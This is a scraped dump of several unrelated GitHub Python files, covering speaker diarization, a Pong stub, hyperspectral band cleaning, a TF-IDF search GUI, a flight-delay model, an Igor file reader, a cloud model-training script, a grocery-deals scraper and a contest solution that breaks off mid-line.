\n\n def __init__(self):\n MODEL_CONFIG = str(CACHE_DIRECTORY / \"diar_infer_meeting.yaml\")\n config = OmegaConf.load(MODEL_CONFIG)\n\n config.num_workers = 1\n config.batch_size = 32\n config.diarizer.manifest_filepath = str(CACHE_DIRECTORY / \"manifest.json\")\n config.diarizer.out_dir = str(CACHE_DIRECTORY / \"diarized\")\n config.diarizer.speaker_embeddings.model_path = \"titanet_large\"\n config.diarizer.speaker_embeddings.parameters.window_length_in_sec = [1.5,1.0,0.5,]\n config.diarizer.speaker_embeddings.parameters.shift_length_in_sec = [0.75,0.5,0.25,]\n config.diarizer.speaker_embeddings.parameters.multiscale_weights = [0.33,0.33,0.33,]\n config.diarizer.speaker_embeddings.parameters.save_embeddings = False\n config.diarizer.ignore_overlap = False\n config.diarizer.oracle_vad = False\n config.diarizer.collar = 0.25\n config.diarizer.vad.model_path = \"vad_multilingual_marblenet\"\n config.diarizer.oracle_vad = False\n\n self.model = ClusteringDiarizer(cfg=config)\n\n def diarize(self, transcription, audioPath):\n MODEL_NAME = \"WAV2VEC2_ASR_LARGE_LV60K_960H\"\n DEVICE = \"cuda\"\n MODEL, METADATA = whisperx.load_align_model(language_code=\"en\", device=DEVICE, model_name=MODEL_NAME)\n resultAligned = whisperx.align(\n transcription[\"segments\"], MODEL, METADATA, audioPath, DEVICE\n )\n\n # Storing words timestamps mapping in a file.\n with open(str(CACHE_DIRECTORY / \"word_ts.text\"), \"w+\") as f:\n for line in resultAligned[\"word_segments\"]:\n line_temp = line.copy()\n line_temp[\"text\"] = line_temp[\"text\"].strip()\n f.write(f\"{json.dumps(line_temp)}\\n\")\n\n # Creating the manifest\n diarize_manifest = {\n \"audio_filepath\": audioPath,\n \"offset\": 0,\n \"duration\": None,\n \"label\": \"infer\",\n \"text\": \"-\",\n \"num_speakers\": None,\n \"rttm_filepath\": str(CACHE_DIRECTORY / \"diarized.rttm\"),\n \"uniq_id\": \"\",\n }\n\n with open(CACHE_DIRECTORY / \"manifest.json\", \"w\") as f:\n f.write(json.dumps(diarize_manifest))\n\n # Running diarization\n self.model.diarize()\n\n speaker_ts = []\n sampleAudio = Path(audioPath)\n with open(str(CACHE_DIRECTORY/ \"diarized\"/ \"pred_rttms\"/ (str(sampleAudio.stem) + \".rttm\")),\"r\",) as f:\n lines = f.readlines()\n for line in lines:\n line_list = line.split(\" \")\n s = int(float(line_list[5]) * 1000)\n e = s + int(float(line_list[8]) * 1000)\n speaker_ts.append([s, e, int(line_list[11].split(\"_\")[-1])])\n\n word_ts = []\n with open(CACHE_DIRECTORY / \"word_ts.text\", \"r+\") as f:\n for line in f:\n line_temp = json.loads(line)\n word_ts.append(line_temp)\n\n wsm = get_words_speaker_mapping(word_ts, speaker_ts, \"start\")\n wsm = get_realigned_ws_mapping_with_punctuation(wsm)\n ssm = get_sentences_speaker_mapping(wsm, speaker_ts)\n diarized = get_speaker_aware_transcript(ssm)\n return diarized\n\n\n","repo_name":"123xan456/Audio-Transcriber","sub_path":"audio-transcriber/DiarizationUtils.py","file_name":"DiarizationUtils.py","file_ext":"py","file_size_in_byte":8379,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2714918993","text":"import turtle\nimport random \n\nrunning = True\n\nwindow = turtle.Screen()\nwindow.title('Pong')\nwindow.bgcolor(\"black\")\nwindow.setup(width=800, height=600)\nwindow.tracer(0) # stops the game from updating\n\ndef paddle(x, y, color):\n obj = turtle.Turtle()\n def __init__(self):\n obj.self.speed(0)\n obj.self.shape('square')\n obj.self.color(color)\n obj.self.shapesize(stretch_wid=5, stretch_len=1)\n obj.self.penup()\n obj.self.goto(x, y)\n\npaddle_a = paddle(-350, 0, \"white\")\npaddle_b = paddle(350, 0, \"white\")\n\ndef main():\n while running:\n window.update()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"BaileyLark/Python","sub_path":"Dec-22/Mess Around/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"18526386733","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport glob, math, subprocess, h5py\nfrom osgeo import gdal\nimport time\nstart = time.time()\n\n#Read in reflectance hdf5 file \nhdf5_file = h5py.File('NEON_D14_SRER_DP3_511000_3520000_reflectance.h5','r')\nfile_attrs_string = str(list(hdf5_file.items()))\nprint(file_attrs_string)\nfile_attrs_string_split = file_attrs_string.split(\"'\")\nsitename = file_attrs_string_split[1]\nrefl = hdf5_file[sitename]['Reflectance']\n#Extract the wavelength datasets\nmetadata = {}\nmetadata['wavelength'] = refl['Metadata']['Spectral_Data']['Wavelength'].value\n#Extract bad band windows\nmetadata['bad_band_window1'] = (refl.attrs['Band_Window_1_Nanometers'])\nmetadata['bad_band_window2'] = (refl.attrs['Band_Window_2_Nanometers'])\n\n\ndata = gdal.Open('Reflct_red.tif')\ndata_clean = data.ReadAsArray()\n\n\n#remove bad bands (NEON)\n#1. define indices corresponding to min/max center wavelength for each bad band window:\nbb1_ind0 = np.max(np.where((np.asarray(metadata['wavelength'])float(metadata['bad_band_window1'][1]))))\n\nbb2_ind0 = np.max(np.where((np.asarray(metadata['wavelength'])float(metadata['bad_band_window2'][1]))))\n\nbb3_ind0 = len(metadata['wavelength'])-10\n\n#define valid band ranges from indices:\nvb1 = list(range(0,bb1_ind0)); \nvb2 = list(range(bb1_ind1,bb2_ind0))\nvb3 = list(range(bb2_ind1,bb3_ind0))\n\nvalid_band_range = [i for j in (range(0,bb1_ind0),\n range(bb1_ind1,bb2_ind0),\n range(bb2_ind1,bb3_ind0)) for i in j]\n\ndata_clean = data_clean[:,:,vb1+vb2+vb3]\n\nmetadata_clean['wavelength'] = [metadata['wavelength'][i] for i in valid_band_range]\n\n#creating 426 bands tiff file with same extent of height mosaic\nchm= gdal.Open('Height.tif')\nbn=chm.GetRasterBand(1)\ndriver = gdal.GetDriverByName(\"GTiff\")\nout = driver.Create('Reflct_BigR.tif', bn.XSize, bn.YSize, 360, 2)\nout.SetProjection(chm.GetProjection())\nout.SetGeoTransform(chm.GetGeoTransform())\nfor k,l in zip(list(range(1,361)),list(range(0,360))):\n\tout.GetRasterBand(k).WriteArray(data[:,:,l]) \ndel out\nend = time.time()\nprint(\"tot time: \", (end-start))\n\n\n\n\n\n\n\n","repo_name":"Rubaya-Pervin/Savanna-fCover","sub_path":"Data_Cleaning.py","file_name":"Data_Cleaning.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42565595814","text":"class IORedirector(object):\n '''A general class for redirecting I/O to this Text widget.'''\n def __init__(self,text_area):\n self.text_area = text_area\n\nclass StdoutRedirector(IORedirector):\n '''A class for redirecting stdout to this Text widget.'''\n def write(self,str):\n self.text_area.write(str,False)\nimport sys\nimport math\nimport operator\nfrom textblob import TextBlob as tb\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport glob\nimport string\nfrom tkinter import *\n\nstop_words = set(stopwords.words(\"English\"))\nsorted_doc_score = []\nroot = Tk()\nroot.title(\"Information Retrieval (Beta v0.1)\")\nroot.geometry(\"432x400\")\n\n\ndef tf(word, blob):\n return blob.words.count(word) / len(blob.words)\n\n\ndef n_containing(word, bloblist):\n return sum(1 for blob in bloblist if word in blob.words)\n\n\ndef idf(word, bloblist):\n x = n_containing(word, bloblist)\n return math.log(len(bloblist) / (x if x else 1))\n\n\n# word is each word in all blobs\n# blob is all words in document\n# bloblist is corpus list\ndef tfidf(word, blob, bloblist):\n return tf(word, blob) * idf(word, bloblist)\n\n\ndef stop_wordss(strings):\n list = []\n str = word_tokenize(strings)\n # P to add here\n for _ in str:\n\n if _ not in stop_words:\n list.append(_)\n\n returnstring = ' '.join(list)\n #print(returnstring, \"\\n\\n\\n\\n\")\n outEntry.insert(0.0,(returnstring, \"\\n\\n\\n\\n\"))\n return returnstring\n\n\ndef unpunk(docs):\n intab = \"!()-[]{};:'\\\"\\,<>./?@#$%^&*_~\"\n outtab = \" \"\n trantab = str.maketrans(intab, outtab)\n # print(str(docs.translate(trantab)))\n return str(docs.translate(trantab))\n\n\n#\n# Initial processing Starts here and branches out.\n# #\n\n\n\ndef insertword(thword, b, p):\n print(\"\\nSearching for \", thword, \"\\n\")\n file_names = sorted(glob.glob(\"../../my_corpus/All/*\"))\n\n files = map(open, file_names)\n documents = []\n s = \"\"\n for file in files:\n if p:\n s = unpunk(file.read())\n else:\n s = file.read()\n if b: stop_wordss(s) # like a toggle\n\n documents.append(s)\n [file.close() for file in files]\n\n doc_no_list = []\n word_score = []\n doc_score_dic = {}\n #\n wordss = []\n w = word_tokenize(thword)\n # print(w)\n for wo in w:\n # print(wo,end=\"\\n\")\n wordss.append(str(wo))\n #\n bloblist = list(map(tb, documents))\n\n for i, blob in enumerate(bloblist):\n # print(\"Score in document {}\".format(i + 1))\n # scores = 0\n scores = {word: tfidf(word, blob, bloblist) for word in wordss}\n #print(scores)\n # outEntry.insert(0.0,scores)\n # ^ dictionary of words with its valuen\n sorted_words = sorted(scores.items(), reverse=True)\n for word, score in sorted_words[:1]:\n s = score * 100\n word_score.append(s)\n doc_no_list.append(i + 1)\n # print(\"\\tWord: {}, TF-IDF: {}\".format(word, round(s, 5)))\n\n doc_score_dic = dict(zip(doc_no_list, word_score))\n # print(doc_score_dic)\n\n sorted_doc_score = sorted(doc_score_dic.items(), key=operator.itemgetter(1), reverse=True)\n\n # print(sorted_doc_score)\n\n for item in sorted_doc_score[:10]:\n val=\"\"\n val = \"Document No : \"+str(item[0]) +\"\\n\"\n outEntry.insert(0.0,val)\n # outEntry.insert(0.0, (returnstring, \"\\n\\n\\n\\n\"))\n\n\n\ndef set_value(event):\n insertword(strVarible.get(), booleanVar.get(), punchVar.get())\n\n\nbooleanVar = BooleanVar()\nbooleanVar.set(False)\npunchVar = BooleanVar()\npunchVar.set(False)\n\nLabel(root, text=\"Enter Query\").grid(row=0, column=0, sticky=W, padx=4)\nstrVarible = StringVar()\nstrVarible.set(\"\")\nstrEntry = Entry(root, width=50, textvariable=strVarible).grid(row=0, column=1)\n\nsearchButton = Button(root, text=\"Search\")\nsearchButton.grid(row=0, column=2, padx=4, pady=4)\nsearchButton.bind(\"\", set_value)\n\nLabel(root, text=\"Options\").grid(row=1, column=0, sticky=W)\nRadiobutton(root, text=\"TF-IDF\", value=1).grid(row=2, column=0, sticky=W)\n\nLabel(root, text=\"Filter\").grid(row=1, column=1, sticky=W)\nstopcheck = Checkbutton(root, text=\"StopWords\", variable=booleanVar)\nstopcheck.grid(row=2, column=1, sticky=W)\n\npunchInCheck = Checkbutton(root, text=\"Remove Punctuation\", variable=punchVar)\npunchInCheck.grid(row=3, column=1, sticky=W)\n\noutEntry = Text(root, width=52, height=20)\noutEntry.grid(row=4, column=0, columnspan=10, rowspan=4)\n\nroot.mainloop()\n","repo_name":"Abhinavrana42016/NLTK_python_IR","sub_path":"GUI/test1/base1.py","file_name":"base1.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"36280190238","text":"#!/usr/bin/python3\ndef text_indentation(text):\n \"\"\"\n Prints a text with 2 new lines after each of these characters:., ? and :\n Args:\n text: The text to be indented\n Raises:\n TypeError: If text is not a string\n \"\"\"\n if not isinstance(text, str):\n raise TypeError(\"text must be a string\")\n\n s = text[:]\n for d in \".?:\":\n list_t = s.split(d)\n s = \"\"\n for i in list_t:\n i = i.strip(\" \")\n s = i + d if s is \"\" else s + \"\\n\\n\" + i + d\n print(s[:-3], end=\"\")\n","repo_name":"GArdennes/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/5-text_indentation.py","file_name":"5-text_indentation.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35588513355","text":"import os\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\n\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\n\nfrom typing import Tuple, Union, List\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\nclass DelayModel:\n\n def __init__(\n self\n ):\n self._model = None # Model should be saved in this attribute.\n\n def preprocess(\n self,\n data: pd.DataFrame,\n target_column: str = None\n ) -> Union[Tuple[pd.DataFrame, pd.DataFrame], pd.DataFrame]:\n \"\"\"\n Prepare raw data for training or predict.\n\n Args:\n data (pd.DataFrame): raw data.\n target_column (str, optional): if set, the target is returned.\n\n Returns:\n Tuple[pd.DataFrame, pd.DataFrame]: features and target.\n or\n pd.DataFrame: features.\n \"\"\"\n # Create feature generator object\n feature_generator = FeatureGenerator(data)\n # Generate features\n features = feature_generator.generate_features()\n # Target column extraction\n if target_column is not None:\n # Shuffle data to ensure that the model being trained on this data is not biased towards any particular order of the rows\n features = shuffle(features[['OPERA', 'MES', 'TIPOVUELO', 'SIGLADES', 'DIANOM', 'delay']], random_state = 111)\n # Target column extraction\n target = features['delay'].to_frame()\n else:\n # Shuffle data to ensure that the model being trained on this data is not biased towards any particular order of the rows\n features = shuffle(features[['OPERA', 'MES', 'TIPOVUELO', 'SIGLADES', 'DIANOM']], random_state = 111)\n # One-hot encoding using DS selected sub-set of features for training\n features = pd.concat([\n pd.get_dummies(features['OPERA'], prefix = 'OPERA'),\n pd.get_dummies(features['TIPOVUELO'], prefix = 'TIPOVUELO'), \n pd.get_dummies(features['MES'], prefix = 'MES')], \n axis = 1\n )\n # From feature importance analysis, the following features were selected\n top_10_features = [\n \"OPERA_Latin American Wings\", \n \"MES_7\",\n \"OPERA_Grupo LATAM\",\n \"OPERA_Sky Airline\",\n \"MES_10\",\n \"MES_8\",\n \"MES_12\",\n \"TIPOVUELO_I\",\n \"OPERA_JetSmart SPA\",\n \"MES_4\"\n ]\n # Select top 10 features for training\n features = features[top_10_features]\n # If target column is not None, return features and target as a Tuple [pd.DataFrame, pd.DataFrame], else return features dataframe\n if target_column is not None: \n return features, target\n else:\n return features\n\n def fit(\n self,\n features: pd.DataFrame,\n target: pd.DataFrame\n ) -> None:\n \"\"\"\n Fit and save Classifier model using previously preprocessed data.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n target (pd.DataFrame): target.\n \"\"\"\n # Split data into train and test sets\n x_train, _, y_train, _ = train_test_split(\n features, \n target, \n test_size = 0.33, \n random_state = 42\n )\n ### Appraoch based on DS exploration notebook\n\n # # Data balance through Scaling\n # n_y0 = len(y_train[y_train == 0])\n # n_y1 = len(y_train[y_train == 1])\n # scale = n_y0/n_y1\n # # Instantiating the model using feature importance and Balanced class weight\n # self._model = LogisticRegression(\n # class_weight={1: n_y0/len(y_train), 0: n_y1/len(y_train)}\n # )\n # # Fitting the model\n # self._model.fit(x_train, y_train)\n\n ### Approach based in my ML expertise\n\n # Define hyperparameters and values to test\n param_grid = {\n 'C': [0.001, 0.01, 0.1, 1, 10, 100],\n 'solver': ['newton-cg', 'lbfgs', 'liblinear', 'sag', 'saga'],\n 'class_weight': ['balanced']\n }\n # Define a grid search with a focus on recall\n grid_search = GridSearchCV(\n LogisticRegression(max_iter=10000), # Increased max_iter for convergence with some solvers\n param_grid, \n scoring='recall', \n cv=5\n )\n # Fit the grid search to the data\n grid_search.fit(x_train, y_train)\n # Use the best estimator found by the grid search\n self._model = grid_search.best_estimator_\n # Create model folder if it does not exist\n if not os.path.exists('model'):\n os.makedirs('model')\n # Save model using pickle\n with open('model/model.pkl', 'wb') as f:\n pickle.dump(self._model, f)\n\n def predict(\n self,\n features: pd.DataFrame\n ) -> List[int]:\n \"\"\"\n Predict delays for new flights.\n\n Args:\n features (pd.DataFrame): preprocessed data.\n \n Returns:\n (List[int]): predicted targets.\n \"\"\"\n # Load model using pickle\n with open('model/model.pkl', 'rb') as f:\n self._model = pickle.load(f)\n delay_predictions = self._model.predict(features)\n return delay_predictions.tolist()\n \nclass FeatureGenerator(object):\n \"\"\"\n Class for generating features from raw data.\n \"\"\"\n def __init__(self, data: pd.DataFrame) -> None:\n self.data = data\n\n def generate_features(self, threshold_in_minutes: int = 15) -> pd.DataFrame:\n \"\"\"\n Generate features from raw data. Return dataframe with generated features.\n\n Args:\n threshold_in_minutes (int, optional): threshold in minutes for delay. Defaults to 15.\n \n Returns:\n (pd.DataFrame): features.\n \"\"\"\n self.data['period_day'] = self.data['Fecha-I'].apply(self.get_period_day)\n self.data['high_season'] = self.data['Fecha-I'].apply(self.is_high_season)\n self.data['min_diff'] = self.data.apply(self.get_min_diff, axis=1)\n self.data['delay'] = np.where(self.data['min_diff'] > threshold_in_minutes, 1, 0)\n return self.data\n \n def get_min_diff(self, data) -> float:\n \"\"\"\n Get difference in minutes between two dates. Return difference in minutes.\n\n Args:\n data (pd.DataFrame): raw data.\n\n Returns:\n (float): difference in minutes.\n \"\"\"\n fecha_o = datetime.strptime(data['Fecha-O'], '%Y-%m-%d %H:%M:%S')\n fecha_i = datetime.strptime(data['Fecha-I'], '%Y-%m-%d %H:%M:%S')\n min_diff = ((fecha_o - fecha_i).total_seconds())/60\n return min_diff\n \n def is_high_season(self, fecha) -> int:\n \"\"\"\n Check if date is in high season. Return 1 if date is in high season, 0 otherwise.\n\n Args:\n fecha (str): date in format YYYY-MM-DD HH:MM:SS.\n\n Returns:\n (int): 1 if date is in high season, 0 otherwise.\n \"\"\"\n fecha_año = int(fecha.split('-')[0])\n fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')\n range1_min = datetime.strptime('15-Dec', '%d-%b').replace(year = fecha_año)\n range1_max = datetime.strptime('31-Dec', '%d-%b').replace(year = fecha_año)\n range2_min = datetime.strptime('1-Jan', '%d-%b').replace(year = fecha_año)\n range2_max = datetime.strptime('3-Mar', '%d-%b').replace(year = fecha_año)\n range3_min = datetime.strptime('15-Jul', '%d-%b').replace(year = fecha_año)\n range3_max = datetime.strptime('31-Jul', '%d-%b').replace(year = fecha_año)\n range4_min = datetime.strptime('11-Sep', '%d-%b').replace(year = fecha_año)\n range4_max = datetime.strptime('30-Sep', '%d-%b').replace(year = fecha_año)\n \n if ((fecha >= range1_min and fecha <= range1_max) or \n (fecha >= range2_min and fecha <= range2_max) or \n (fecha >= range3_min and fecha <= range3_max) or\n (fecha >= range4_min and fecha <= range4_max)):\n return 1\n else:\n return 0\n \n def get_period_day(self, date) -> str:\n \"\"\"\n Get period of day from date. Return string with period of day.\n\n Args:\n date (str): date in format YYYY-MM-DD HH:MM:SS.\n \n Returns:\n (str): period of day.\n \"\"\"\n date_time = datetime.strptime(date, '%Y-%m-%d %H:%M:%S').time()\n morning_min = datetime.strptime(\"05:00\", '%H:%M').time()\n morning_max = datetime.strptime(\"11:59\", '%H:%M').time()\n afternoon_min = datetime.strptime(\"12:00\", '%H:%M').time()\n afternoon_max = datetime.strptime(\"18:59\", '%H:%M').time()\n evening_min = datetime.strptime(\"19:00\", '%H:%M').time()\n evening_max = datetime.strptime(\"23:59\", '%H:%M').time()\n night_min = datetime.strptime(\"00:00\", '%H:%M').time()\n night_max = datetime.strptime(\"4:59\", '%H:%M').time()\n \n if(date_time > morning_min and date_time < morning_max):\n return 'mañana'\n elif(date_time > afternoon_min and date_time < afternoon_max):\n return 'tarde'\n elif(\n (date_time > evening_min and date_time < evening_max) or\n (date_time > night_min and date_time < night_max)\n ):\n return 'noche'\n \n# Creating main entrypoint for runnig this file as CLI for easy-testing implementation\nif __name__ == \"__main__\":\n print(\"Running model.py as CLI\")\n # Create dalay model object\n model = DelayModel()\n # Execute preprocess method\n features, target = model.preprocess(\n data=pd.read_csv(filepath_or_buffer=\"/home/marlon/MachineLearning/Flight-Delay-Prediction-App/data/data.csv\"),\n target_column=\"delay\"\n )\n # Simulating test assertions for this step\n FEATURES_COLS = [\n \"OPERA_Latin American Wings\", \n \"MES_7\",\n \"OPERA_Grupo LATAM\",\n \"OPERA_Sky Airline\",\n \"MES_10\",\n \"MES_8\",\n \"MES_12\",\n \"TIPOVUELO_I\",\n \"OPERA_JetSmart SPA\",\n \"MES_4\"\n ]\n\n TARGET_COL = [\n \"delay\"\n ]\n assert isinstance(features, pd.DataFrame)\n assert features.shape[1] == len(FEATURES_COLS)\n assert set(features.columns) == set(FEATURES_COLS)\n\n assert isinstance(target, pd.DataFrame)\n assert target.shape[1] == len(TARGET_COL)\n assert set(target.columns) == set(TARGET_COL)\n # Split data into train and test sets\n _, features_validation, _, target_validation = train_test_split(features, target, test_size = 0.33, random_state = 42)\n # Execute fit method\n model.fit(\n features=features,\n target=target\n )\n predicted_target = model._model.predict(\n features_validation\n )\n report = classification_report(target_validation, predicted_target, output_dict=True)\n print(report)\n # execute predict method\n features = model.preprocess(\n data=pd.read_csv(filepath_or_buffer=\"/home/marlon/MachineLearning/Flight-Delay-Prediction-App/data/data.csv\")\n )\n if model._model is None:\n raise ValueError(\"Model has not been initialized or trained!\")\n predicted_targets = model.predict(\n features=features\n )\n assert isinstance(predicted_targets, list)\n assert len(predicted_targets) == features.shape[0]\n assert all(isinstance(predicted_target, int) for predicted_target in predicted_targets)\n","repo_name":"MarlonCajamarca/Flight-Delay-Prediction-App","sub_path":"challenge/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32889942951","text":"import doctest, unittest\n\nimport music21\nfrom music21 import common, corpus\n\nfrom music21 import environment\n_MOD = 'test/testPerformance.py'\nenvironLocal = environment.Environment(_MOD)\n\n#-------------------------------------------------------------------------------\nclass TestPerformance(unittest.TestCase):\n\n def runTest(self):\n pass\n\n def testTimingTolerance(self):\n '''Test the performance of loading various files\n This may not produce errors as such, but is used to provide reference\n if overall performance has changed.\n '''\n # provide work and expected min/max in seconds\n for known, max, best in [\n ('beethoven/opus59no2/movement3', 9, \n {'2009.12.14': 7.42, \n '2009.12.15': 6.686,\n '2010.06.24': 7.475,\n }),\n ('haydn/opus74no1/movement3', 5, \n {'2009.12.14': 4.08, \n '2009.12.15': 3.531,\n '2010.06.24': 3.932,\n }),\n ('schumann/opus41no1/movement2', 7, \n {'2009.12.14': 5.88, \n '2009.12.15': 5.126,\n '2010.06.24': 5.799,\n }),\n ('luca/gloria', 4,\n {'2009.12.14': 3.174, \n '2009.12.15': 2.954,\n '2010.06.24': 3.063,\n }),\n ]:\n\n t = common.Timer()\n t.start()\n x = corpus.parseWork(known, forceSource=True)\n t.stop()\n dur = t()\n environLocal.printDebug(['timing tolerance for', known, \n 'this run:', t, 'best runs:', \n ['%s: %s' % (x, y) for x, y in best.items()]])\n self.assertEqual(True, dur <= max) # performance test\n\n\n\n\nif __name__ == \"__main__\":\n music21.mainTest(TestPerformance)\n\n","repo_name":"morganecf/music21","sub_path":"music21/test/testPerformance.py","file_name":"testPerformance.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33345268558","text":"import traceback\n\nfrom . import igor\n\nfrom .igor import Wave, Wave1d, Wave2d\n\n__version__ = \"0.1.0\"\n\n\ndef read_itx(fname):\n \"\"\"\n Returns the list of igor waves that are included in the .itx file \n \"\"\"\n f=open(fname, 'r')\n lines=f.readlines()\n f.close()\n\n line = lines.pop(0).strip()\n if not line == \"IGOR\":\n raise IOError(\"Files does not begin with 'IGOR'\")\n\n waves = []\n while len(lines) != 0:\n try:\n wave = igor.read_wave(lines)\n if wave is not None:\n waves.append(wave)\n except Exception:\n traceback.print_exc()\n\n return waves\n\ndef write_2d_itx(fname, data, xaxis, yaxis, wavename):\n \"\"\"\n Write a 2-dimensional data as .itx file\n\n Args:\n fname: Name of the output file\n data: the 2d data\n xaxis: iterable containing (x_min, x_delta, unit)\n yaxis: iterable containing (y_min, y_delta, unit)\n wavename: name of the igor wave\n \"\"\"\n\n x = igor.Axis('x', xaxis[0], xaxis[1], xaxis[2], wavename)\n y = igor.Axis('y', yaxis[0], yaxis[1], yaxis[2], wavename)\n\n wave = Wave2d(\n data=data,\n axes=[x,y],\n name=wavename,\n )\n \n wave.write(fname)\n \n","repo_name":"nanotech-empa/igor-tools","sub_path":"igor_tools/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44289089577","text":"from google.cloud import storage\nimport pandas as pd\nimport os\n\ndef upload_blob(bucket_name, source_file_name, destination_blob_name):\n storage_client = storage.Client.from_service_account_json('argok3s.json')\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n blob.upload_from_filename(source_file_name)\n\ndef download_blob(bucket_name, source_blob_name, destination_file_name):\n storage_client = storage.Client.from_service_account_json('argok3s.json')\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(source_blob_name)\n blob.download_to_filename(destination_file_name)\n\nbucket = os.environ[\"BUCKET\"]\nprint(\"Downloading CSV...\",end=\"\")\n#change here the bucket\ndownload_blob(bucket,\"scores_processed.csv\",\"scores_processed.csv\")\nprint(\"done\")\n\nprint(\"Reading Data...\")\ndf = pd.read_csv('scores_processed.csv',sep=';', delimiter=None, header='infer')\nprint(\"done\")\n\nprint(df.head(5))\n\nprint(\"Preparing Experiment...\",end=\"\")\nfeature_cols = [\"ZONE\",\"P1\",\"P2\"]\nX = df.loc[:, feature_cols]\ny = df.FINAL\nprint(\"done\")\n\nprint(\"Generating model...\",end=\"\")\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\n\nclf = LinearRegression().fit(X, y)\nprint(\"prediction\",clf.predict([[25,19,18]]),end=\"\")\nprint(\"done\")\n\nprint(\"Uploading model to Cloud Storage...\",end=\"\")\nfrom joblib import dump\ndump(clf, 'scores.model')\n#change here the bucket\nupload_blob(bucket,\"scores.model\",\"scores.model\")\nprint(\"done\")\n","repo_name":"sergioarmgpl/mlops-argo-k3s","sub_path":"containers/model_training/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"61"} +{"seq_id":"25532787569","text":"from .selenium_webscraper import SeleniumWebscraper\nfrom seleniumwire.utils import decode\nimport time\nfrom datetime import date, datetime\nimport json\n\n\nclass LoblawsSeleniumWebscraper(SeleniumWebscraper):\n\n def __init__(self):\n super().__init__()\n self.LOBLAWS_API_URL = (\"https://api.pcexpress.ca/\"\n \"product-facade/v3/products/deals\")\n self.STORE_NAME = \"Loblaws\"\n self.STORE_URL = (\"https://www.loblaws.ca/deals/all?sort=relevance&\"\n \"category=27985&promotions=Price%20Reduction\")\n\n def get_products(self):\n self.driver.get(self.STORE_URL)\n time.sleep(5)\n\n self._scroll_down()\n # self.driver.save_screenshot(\"loblaws_sc.png\")\n items = self._get_required_responses()\n processed_data = self._process_items(items)\n self.driver.quit()\n\n return processed_data\n\n def _process_items(self, items):\n # Prepare data to be added to the database\n processed_data = []\n for item in items:\n link = \"https://www.loblaws.ca\" + item[\"link\"]\n expiry_date_txt = item[\"badges\"][\"dealBadge\"][\"expiryDate\"]\n expiry_date = datetime.strptime(expiry_date_txt[:10], \"%Y-%m-%d\")\n expiry_date_str = expiry_date.strftime(\"%Y%m%d\")\n tup = (item[\"name\"], self.STORE_NAME,\n item[\"prices\"][\"price\"][\"value\"],\n item[\"prices\"][\"wasPrice\"][\"value\"], link,\n item[\"packageSize\"], date.today().strftime(\"%Y%m%d\"),\n expiry_date_str)\n processed_data.append(tup)\n return processed_data\n\n def _scroll_down(self):\n # Scroll down to the bottom of the page to load all offers\n get_height_command = \"return document.body.scrollHeight\"\n last_height = self.driver.execute_script(get_height_command)\n new_height = -1\n while last_height != new_height:\n last_height = new_height\n scroll_down = \"window.scrollTo(0, document.body.scrollHeight);\"\n self.driver.execute_script(scroll_down)\n time.sleep(1)\n new_height = self.driver.execute_script(get_height_command)\n\n def _get_required_responses(self):\n # Only decode and return responses that came from their deals POST API\n items = []\n for request in self.driver.requests:\n if request.url == self.LOBLAWS_API_URL:\n response = request.response\n if response is None:\n continue\n body = decode(response.body,\n response.headers.get(\"Content-Encoding\",\n \"identity\"))\n json_body = json.loads(body.decode(\"utf-8\"))\n items.extend(json_body[\"results\"])\n return items\n","repo_name":"karimzakir02/Sales-Toronto","sub_path":"webapp/selenium_webscrapers/loblaws_selenium_webscraper.py","file_name":"loblaws_selenium_webscraper.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23584934421","text":"#! /bin/python\n\nfrom sys import stdin\nfrom math import inf\n\nT = int(stdin.readline())\n\n\nfor t in range(T):\n [N, Q] = [int(x) for x in stdin.readline().split()]\n cities = []\n for _ in range(N):\n [e, s] = stdin.readline().split()\n cities.append((int(e), int(s)))\n\n G = []\n for _ in range(N):\n G.append([int(x) for x in stdin.readline().split()])\n\n for _ in range(Q):\n [u, v] = [int(x) for x in stdin.readline().split()]\n\n # Small case\n minTime = [inf]*N\n minTime[N-1] = 0\n for city in range(N-2, -1, -1):\n times = []\n d = 0\n for dest in range(city+1, N):\n (e, s) = cities[city]\n # d = sum(G[x][x+1] for x in range(city, dest))\n d += G[dest-1][dest]\n if e >= d:\n times.append(minTime[dest] + d/s)\n else:\n break\n minTime[city] = min(times)\n\n print(\"Case #{}: {}\".format(t+1, 